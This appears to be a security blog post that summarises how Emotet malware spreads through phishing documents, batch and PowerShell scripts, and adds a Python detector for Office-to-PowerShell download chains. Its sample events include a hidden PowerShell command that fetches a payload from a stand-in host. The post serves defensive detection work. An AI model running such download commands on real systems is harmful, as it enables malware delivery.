Emotet technical/behavior overview
This is a great article covering the basics of the Emotet malware that has been active in recent months. While not a hard-core drilldown into the code, it gives anyone the ability to watch for certain files, block particular URLs, and understand the infection lifecycle so they know what not to do (hopefully in advance, though more likely what not to do again).
“Emotet is principally delivered as part of an email phishing campaign. The user would receive a reasonably well-constructed email which claims to have an invoice, or an order, or an unpaid bill. The user opens the document, which could be one of many malware types. The document will then invoke a batch script, followed by a PowerShell script, to cycle through a number of URLs for hijacked websites to download the Emotet payload. The payload will run, persisting itself, and then get on with the job of being evil.”
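The delivery chain quoted above (Office document, then a batch script, then PowerShell fetching the payload from a URL) is exactly the parent/child process pattern a defender can alert on. The following is an added example, not code from the article or from any vendor: it runs a simple process-ancestry check over constructed Sysmon-style process-creation records (pid, ppid, image, command line); the application and host names are assumptions, not indicators from the page.

```python
import re
from typing import Dict, List

# Office applications that should never be the ancestor of a downloading PowerShell
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample process-creation events (not real telemetry). The fields
# mirror what an EDR or Sysmon Event ID 1 record carries.
EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "ppid": "1",   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": "200", "ppid": "100", "image": "winword.exe",    "cmdline": "winword.exe /n invoice_8823.doc"},
    {"pid": "300", "ppid": "200", "image": "cmd.exe",        "cmdline": "cmd.exe /c %TEMP%\\run.bat"},
    {"pid": "400", "ppid": "300", "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -c iwr http://example.invalid/drop"},
    # Admin opening a console and fetching something: no Office ancestor, so benign here
    {"pid": "500", "ppid": "100", "image": "cmd.exe",        "cmdline": "cmd.exe"},
    {"pid": "600", "ppid": "500", "image": "powershell.exe", "cmdline": "powershell.exe -c iwr http://example.invalid/tool"},
    # Office spawning PowerShell without any URL in the command line: not flagged
    {"pid": "700", "ppid": "200", "image": "powershell.exe", "cmdline": "powershell.exe -c Get-Date"},
]


def find_office_to_powershell_downloads(events: List[Dict[str, str]], max_depth: int = 3) -> List[str]:
    """Return the pids of powershell.exe processes whose command line carries a URL and
    which descend, within max_depth parent hops, from an Office application. That is
    the document -> batch -> PowerShell -> download chain described in the quote."""
    by_pid = {e["pid"]: e for e in events}
    hits: List[str] = []
    for e in events:
        if e["image"].lower() != "powershell.exe" or not URL_RE.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        for _ in range(max_depth):  # walk up the ancestry a bounded number of hops
            if parent is None:
                break
            if parent["image"].lower() in OFFICE_APPS:
                hits.append(e["pid"])
                break
            parent = by_pid.get(parent["ppid"])
    return hits


if __name__ == "__main__":
    for pid in find_office_to_powershell_downloads(EVENTS):
        print(f"ALERT pid={pid}: {EVENTS[int(pid) // 100 - 1]['cmdline']}")  # pid 400 only
```

Tune `max_depth` and the `OFFICE_APPS` set to your environment; the walk is bounded so a reparented or long-lived console does not pull unrelated activity into the alert.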
Mentioned: